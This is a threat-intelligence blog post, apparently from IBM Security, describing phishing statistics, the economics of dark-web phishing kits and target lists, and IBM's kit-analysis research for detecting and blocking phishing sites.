Why is one of cybercrime’s oldest threats still so strong? The Anti-Phishing Working Group (APWG) reports that January 2021 marked an all-time high in APWG archives, with more than 245,771 phishing attacks in a month.
IBM X-Force Threat Intelligence Index 2021 found that phishing was responsible for 33% of cyber attacks organizations faced. Phishing, an online threat that emerged in the mid-1990s, continues to be a prominent cybercrime practice today that impacts brands and businesses and is a prolific initial driver of compromise in attacks. nation states.
What makes phishing so prevalent? Why is it still successful? Cybercriminals have developed their abilities over time. Many attacks are more sophisticated, harder to detect, and most importantly, easier for criminals to create and deploy on a large scale. Phishing attacks can lead to losses of up to $ 17,700 per minute and are among the main threats. An annual fbi report calculated losses of over $ 4 billion in 2020 due to internet crime, with phishing attacks leading the way. Clearly, phishing is an endemic threat that continues to plague consumers, businesses and nations, and requires continued education and mitigation efforts.
IBM’s deep dive into phishing attacks
To better understand phishing, IBM Security is conducting ongoing research into the phishing kits and phishing sites that fuel this area of cybercrime. By examining phishing kits at the code level, IBM researchers analyzed more than 40,000 phishing kits and deconstructed them into their basics. We analyze things like exfiltration methodologies, uncover compromised data, and monitor live phishing campaigns. Think of this research as setting up a sandbox for phishing.
Microanalysing the items in each kit gives us detailed insight and the ability to detect new phishing sites with zero false positives. We can also infer the proliferation of kits and campaigns and collect data to see the current activity of a given phishing site.
The goal of IBM’s research is zero-day detection of phishing sites that directly results in blocking access to those pages in real time. It can also mean blocking data exfiltration for users who have already been hacked.
This article on our research is the first in a series of blogs that describe our findings and their importance to the anti-fraud, cybercrime and threat intelligence communities.
Large Scale Phishing – Quick and Dirty Scam
It’s easier and cheaper than ever for phishers to step up their attacks. Phishing itself doesn’t deserve much more – it is a very short-lived form of online threat, typically lasting an average of 21 hours from initiation to removal.
According to already published research, it takes an average of nine hours after a victim visits a malicious domain for the first detection to take place, and seven hours after that for the browser block to take effect and reach a peak detection of that site. What about the extra five hours in this lifecycle? These can be counted against the time it takes for victims to receive the link and start browsing the site.
Kit code and hosting – Use and reuse
Since the lifespan of a phishing is quite limited, it is not economically viable for most ordinary attackers to invest in its inner workings or infrastructure. So they mostly use the same existing kits with the same codes and methods to launch the same types of attacks over and over again. This is also what makes their attacks much easier to detect.
The majority of the phishing sites we see in our daily analysis come from phishing kits available for purchase on the dark web and reused by many different players. Typical kits are professionally written and can contain thousands of lines of code. They can be configurable according to the campaign and even have an appropriate error report. These kits range in price from a few hundred to a few thousand dollars and can be deployed in minutes.
Conversely, malware attacks change all the time, changing tactics for all aspects, especially the underlying code.
In most of the attacks we see, phishers register cheap domains for malicious use, host attacks on a compromised domain, or a combination of both. Some domain registrations are easy to fund, and that doesn’t require you to operate or compromise an existing site. The downside is that it is easier to detect and block a standalone malicious site compared to an attack hosted on an established legitimate site. Dark web providers who play the phishing game sell access to compromised servers, but this option increases the overall cost of the attack.
Target lists from $ 50 to $ 500
Once the phishing attack is ready, it should target potential victims. To send it to the right audience, phishers can either contract an underground spam service or buy their own target lists. Target lists can be region or language specific and can help attackers break into webmail provider inboxes and corporate emails. Depending on the viability of the data and its content, mailing lists can range from $ 50 to $ 500. The price is offset by reusing the same list for further attacks or reselling it to other criminals.
Spam campaign – the essentials
For a phishing campaign to be effective, it requires some basic features that help the phisher get things done:
- A spam service or an application that can send emails / texts containing the phishing URL
- A service or application that schedules campaigns
- A service or application that can upload target data to the domain
- Code base for a website that mimics legitimate brands – aka a kit
- A way to collect and move the data that the victim provides on the phishing page
- A way to collect statistics on the success of the attack campaign during its life cycle.
Phishing campaigns are so ubiquitous due to the relatively low cost of phishing kits and the ease of deployment. In fact, we can see multiple phishing campaigns deployed by the same individual on the same day.
Can phishers face legal consequences? Sometimes, but more often, phishers use mules and fake identities to present the campaigns, hiding the true identity of the perpetrators.
Coming Soon – Phishing Kit DNA
Phishers can be obscure in nature, but phishing kits can certainly be analyzed and detected. The faster a malicious page is identified, the faster it can be blocked. To this end, IBM Security has developed a way to explore the DNA of the kits and identify phishing pages with certainty. This allows faster blocking. IBM worked with Quad9 to develop a malicious content blocking tool that is available free of charge to anyone who directs their DNS to Quad9. It’s public, and it’s free.
Stay tuned to this blog post for the next post to learn more about how we analyze kit DNA.